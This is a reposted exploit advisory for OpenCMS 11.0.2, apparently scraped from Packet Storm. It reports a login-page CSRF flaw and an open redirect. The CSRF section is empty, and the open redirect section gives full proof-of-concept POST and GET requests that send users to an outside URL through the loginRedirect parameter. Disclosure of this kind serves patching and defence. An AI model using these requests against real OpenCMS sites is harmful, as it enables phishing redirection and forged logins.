OpenCMS 11.0.2 Cross Site Request Forgery / Open Redirection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 9th, 2021 📆 | 4816 Views ⚑

0

OpenCMS 11.0.2 Cross Site Request Forgery / Open Redirection ≈ Packet Storm

OpenCMS v11.0.2
————————————————————————————————————————————————–
CSRF – Login page vulnerable (https://vulnerablehost.com/system/login – CSRF needs valid JSESSIONID to work, maybe logged Admin user)










————————————————————————————————————————————————–

Open Redirect (POST method – Open Redirect needs valid JSESSIONID to work, maybe logged Admin user)

POST /system/login HTTP/1.1
Host: vulnerablehost.com
Connection: close
Content-Length: 63
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://vulnerablehost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://vulnerablehost.com/system/login
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID_opencms=valid JSESSIONID authenticated cookie

ocUname=Admin&ocPword=admin123&loginRedirect=https://google.com

————————————————————————————————————————————————–

Open Redirect GET method – Open Redirect needs valid JSESSIONID to work, maybe logged Admin user)

GET /system/login?loginRedirect=https://google.com HTTP/1.1
Host: vulnerablehost.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://vulnerablehost.com/system/login
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=Valid JSESSIONID authenticated cookie

Source link

Tagged with:



Leave a Reply